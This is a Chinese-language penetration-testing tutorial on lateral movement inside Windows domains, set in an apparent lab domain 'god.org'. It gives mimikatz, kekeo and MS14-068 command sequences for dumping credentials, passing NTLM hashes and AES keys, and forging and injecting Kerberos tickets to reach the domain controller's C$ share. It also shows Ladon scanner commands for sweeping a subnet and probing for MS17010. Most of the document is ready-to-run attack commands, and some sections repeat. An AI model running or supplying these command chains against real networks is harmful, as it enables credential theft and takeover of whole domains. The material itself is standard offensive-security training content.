內網域橫向PTH&PTK&PTT哈希票據傳遞

Kerberos 協議具體作業方法，在域中，簡要介紹一下：

? 客戶機將明文密碼進行 NTLM 哈希,然后和時間戳一起加密(使用
krbtgt 密碼 hash 作為密鑰)，發送給 kdc（域控），kdc 對用戶進行檢
測，成功之后創建 TGT(Ticket-Granting Ticket)

? 將 TGT 進行加密簽名回傳給客戶機器，只有域用戶 krbtgt 才能讀
取 kerberos 中 TGT 資料

? 然后客戶機將 TGT 發送給域控制器 KDC 請求 TGS（票證授權服
務）票證，并且對 TGT 進行檢測

? 檢測成功之后，將目標服務賬戶的 NTLM 以及 TGT 進行加密，將
加密后的結果回傳給客戶機，

PTH，PTT，PTK概念：

PTH(pass the hash)#利用 lm 或 ntlm 的值進行的滲透測驗
PTT(pass the ticket) #利用的票據憑證 TGT 進行的滲透測驗
PTK(pass the key)#利用的 ekeys aes256 進行的滲透測驗

windows系統LM Hash 及NTLM Hash加密演算法，個人系統在windows vista后，服務器系統在windows 2003以后，認證方式均為NTLM Hash

可以把票據理解為登錄網站后留下來的cookie，或者說和別人建立連接的一個憑據在你電腦上，這時候你就可以用這個票據進行重新連接，票據就是好比cookie

PTH和PTK連接協議是一樣的，PTT協議不同，它是kerberos協議，

#PTH 在內網滲透中是一種很經典的攻擊方式，原理就是攻擊者可以直接通過 LM Hash 和 NTLM Hash
訪問遠程主機或服務，而不用提供明文密碼，

如果禁用了 ntlm 認證，PsExec 無法利用獲得的 ntlm hash 進行遠程連接，但是使用 mimikatz 還是可以攻擊成功，對于 8.1/2012r2，***安裝補丁 kb2871997*** 的 Win 7/2008r2/8/2012 等，可以使用 AES keys
代替 NT hash 來實作 ptk 攻擊,

總結：KB2871997 補丁后的影響

1.pth（lm 或 ntlm）：沒打補丁用戶都可以連接，打了補丁只能 administrator 連接
2.ptk（ekeys aes256）：打了補丁才能用戶都可以連接，采用 aes256 連接
https://www.freebuf.com/column/220740.html
3.#PTT 攻擊的部分就不是簡單的 NTLM 認證了，它是利用 Kerberos 協議進行攻擊的，這里就介紹三種常見的攻擊方法：MS14-068，Golden ticket，SILVER ticket，簡單來說就是將連接合法的票據注入到記憶體中實作連接，

MS14-068 基于漏洞，Golden ticket(黃金票據)，SILVER ticket(白銀票據)
其中 Golden ticket(黃金票據)，SILVER ticket(白銀票據)屬于權限維持技術
（1）MS14-068 造成的危害是允許域內任何一個普通用戶，將自己提升至域管權限，微軟給出的補丁是kb3011780

演示案例：

? 域橫向移動 PTH 傳遞-Mimikatz
? 域橫向移動 PTK 傳遞-Mimikatz
? 域橫向移動 PTT 傳遞-MS14068 & kekeo & local
? 國產 Ladon 內網殺器測驗驗收 - 資訊收集,連接等

案例 1-域橫向移動 PTH 傳遞-mimikatz

Pass The Hash哈希傳遞，該方法通過找到賬戶相關的密碼散列值（通常是NTLM hash）來進行攻擊，在域環境中，用戶登錄計算機時大都是域賬號，大量計算機在安裝的時候會使用相同的本地管理員賬號密碼，因此，如果計算機的本地管理賬號和密碼也是相同，攻擊者就能使用hash傳遞攻擊的方法登錄內網中其他計算機，同時，通過哈希傳遞攻擊，攻擊者不需要花費事假破解密碼散列值（進而會的明文密碼） ，

PTH(哈希傳遞pass the hash)傳遞就可以借助工具mimikatz，這款工具不僅是憑證的獲取工具，就是獲取明文密碼的工具，還可以進行相關攻擊，比如說

PTH ntlm 傳遞

未打補丁下的作業組及域連接：

sekurlsa::logonPasswords	獲取NTLM值
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7		假設知道域控上的hash,連接域用戶
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c		連接本地用戶
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7

注意區分本地用戶與域用戶，在實戰中都嘗試連接一下 
dir \\OWA2010CN-God.god.org\c$
dir \\192.168.3.21\c$
視頻中的域控制器\\OWA2010CN-God.god.org

命令：
privilege::debug
sekurlsa::logonPasswords（獲取明文密碼）

sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7（mimikatz運行后會彈出一個視窗cmd）
在彈出的視窗中輸入dir \\192.168.3.21\c$（ip地址不識別的話可以換成計算機名）

彈出一個新的cmd框，在彈出框內嘗試dir \<域內IP>c$命令，遍歷域內IP，嘗試連接域內其他主機，只要彈出框，就說明一定有一個域內主機與我們收集到的NTLM值相同，由于我們是為了測驗，所以剛才使用的是域控的NTLM值ccef208c6485269c20db2cad21734fe7，所以如下圖所示，正好連接域控，接下來我們就可以進行復制檔案、執行檔案等操作了，

dir \\OWA2010CN-God.god.org\c$
dir \\192.168.3.21\c$

注意：在PTH ntlm傳遞之前，連接是失敗的，如下圖所示，嘗試連接并查看域控c盤目錄，由于沒有用戶名密碼，登錄失敗，

dir \\OWA2010CN-God.god.org\c$``
dir \\192.168.3.21\c$

案例 2-域橫向移動 PTK 傳遞-mimikatz

PTK aes256 傳遞- 打補丁后的作業組及域連接：

<1>mimikatz運行sekurlsa::ekeys命令獲取aes256_hmac，
sekurlsa::ekeys #獲取aes256值
<2>運行以下命令，進行域橫向移動PTK傳遞
sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

在實戰中，user、domain、aes256的值都是可以寫成一個字典，進行批量測驗，

在實際上，PTK傳遞比PTH傳遞用的少，因為PTK傳遞需要一個前提條件，主機必須打了補丁kb2871997，

案例演示

<1>mimikatz運行sekurlsa::ekeys命令獲取aes256_hmac，

<2>運行以下命令，進行域橫向移動PTK傳遞

sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

在實戰中，user、domain、aes256的值都是可以寫成一個字典，進行批量測驗，

在實際上，PTK傳遞比PTH傳遞用的少，因為PTK傳遞需要一個前提條件，主機必須打了補丁kb2871997，

案例3：域橫向移動PTT傳遞-ms14068&kekeo&本地

總結：ptt傳遞不需本地管理員權限，連接時主機名連接，基于漏洞,工具,本地票據

#案例 3-域橫向移動 PTT 傳遞-ms14-068&kekeo & 本地

總結：ptt傳遞不需本地管理員權限，連接時主機名連接，基于漏洞,工具,本地票據

第一種利用漏洞MS14-068：

能實作普通用戶直接獲取域控 system 權限

MS14-068下載：https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

#MS14-068 powershell 執行

1.查看當前 sid ：

whoami/user

2.清空當前機器中所有憑證

mimikatz # kerberos::purge //清空當前機器中所有憑證,如果有域成員憑證會影響憑證偽造（不用提升權限）
mimikatz # kerberos::list //查看當前機器憑證
mimikatz # kerberos::ptc 票據檔案 //將票據注入到記憶體中

3.利用 ms14-068 生成 TGT 資料

ms14-068.exe -u 域成員名@域名 -s sid -d 域控制器地址 -p 域成員密碼
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -
p admin!@#45

生成名為：TGT_mary@god.org.ccache的檔案

4.票據注入記憶體

mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit

5.查看憑證串列 ：klist（當前計算機和哪些東西進行連接，如果要洗掉票據可以使用命令klist purge）

6.利用

(如果ip連接不了就可以用計算機名)

dir \192.168.3.21\c$
dir \\OWA2010CN-God.god.org\c$

這個票據傳遞的原理就是生成一個合法的連接請求，然后用mimikatz匯入記憶體中，所以連接的時候就不用連接密碼

案例演示

<1>whoami/user 查看當前sid

我們知道mary就是域內一個普通用戶

<2>清空當前機器中所有憑證，如果有域成員憑證會影響憑證偽造

klist //查看憑證串列
klist purge //清空當前機器中所有憑證，如果有域成員憑證會影響憑證偽造

<3>利用ms14-068生成TGT資料

ms14-068.exe -u 域成員名@域名 -s sid -d 域控制器地址 -p 域成員密碼MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45

<4>將票據注入到記憶體中

./mimikatz.exekerberos::ptc TGT_mary@god.org.ccacheexit

<5>查看憑證串列，klist 查看一下，注入成功，

<6>利用

dir\192.168.3.21\c$dir\\OWA2010CN-God.god.org\c$

第二種利用工具 kekeo

工具kekeo下載：https://github.com/gentilkiwi/kekeo/releases

1.生成票據
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"
2.匯入票據
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
3.查看憑證 klist
4.利用 net use 載入
dir \\192.168.3.21\c$
dir \\OWA2010CN-God.god.org\c$

案例演示

<1>生成票據，匯入票據

kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c" //生成票據
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi //匯入票據

<2>查看憑證 klist

<3>利用

dir \192.168.3.21\c$
dir \\OWA2010CN-God.god.org\c$

第三種利用本地票據(需管理權限)

因為當前主機肯定之前與其他主機連接過，所以本地應該生成了一些票據，我們可以匯出這些票據，然后再匯入票據，利用，該方法類似于cookie欺騙，

缺點：票據是有有效期的，一般為10小時，所以如果當前主機10h之內連接過域控的話，我們可以利用該票據，但是如果超過10h，就沒法利用了，

sekurlsa::tickets /export //匯出本地票據(需管理權限) 
kerberos::ptt xxxxxxxxxx.xxxx.kirbi( //匯入票據)
klist //查看票據
dir \\OWA2010CN-God.god.org\c$ //利用
dir \192.168.3.21\c$
總結：ptt 傳遞不需本地管理員權限，連接時主機名連接，基于漏洞,工具,本地票據

案例演示

<1>匯出本地票據(需管理權限)到當前目錄

sekurlsa::tickets /export

下面是所有匯出的票據

此時klist查看票據為空

<2>匯入票據

kerberos::ptt xxxxxxxxxx.xxxx.kirbi //匯入票據

<3>klist查看票據，匯入成功，

<4>利用

dir \\OWA2010CN-God.god.org\c$ //利用
dir \192.168.3.21\c$

#案例 4-國產 Ladon 內網殺器測驗驗收

資訊收集-協議掃描-漏洞探針-傳遞攻擊等
涉及資源：

官網：http://k8gege.org/Ladon/

大型內網滲透掃描器&Cobalt Strike，Ladon8.9內置120個模塊，包含資訊收集/存活主機/埠掃描/服務識別/密碼爆破/漏洞檢測/漏洞利用，漏洞檢測含MS17010/SMBGhost/Weblogic/ActiveMQ/Tomcat/Struts2，密碼口令爆破(Mysql/Oracle/MSSQL)/FTP/SSH(Linux)/VNC/Windows(IPC/WMI/SMB/Netbios/LDAP/SmbHash/WmiHash/Winrm),遠程執行命令(smbexec/wmiexe/psexec/atexec/sshexec/webshell),降權提權Runas、GetSystem，Poc/Exploit,支持Cobalt Strike 3.X-4.0

具體用法請查看官網wiki，舉例如下

Ladon.exe 192.168.1.8/24 OnlinePC 掃當前機器所處C段的存活主機，其它模塊同理Ladon.exe 192.168.1.8/24 OsScan 掃當前機器所處C段作業系統版本，其它模塊同理Ladon.exe 192.168.1.8/24 MysqlScan 掃當前機器所處C段的ssh埠，其它模塊同理Ladon 192.168.1.8/24 MS17010 掃當前機器所處C段的永恒之藍漏洞，其它模塊同理參考：

https://www.cnblogs.com/zpchcbd/p/11944486.html

參考：https://www.cnblogs.com/zhengna/p/15320256.html
涉及資源:
https://github.com/k8gege/Ladon
https://github.com/gentilkiwi/kekeo/releases
https://github.com/abatchy17/indowsExploits/tree/master/MS14-068
https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw提取碼:xiao

k8gege/Ladon at v6.1 (github.com)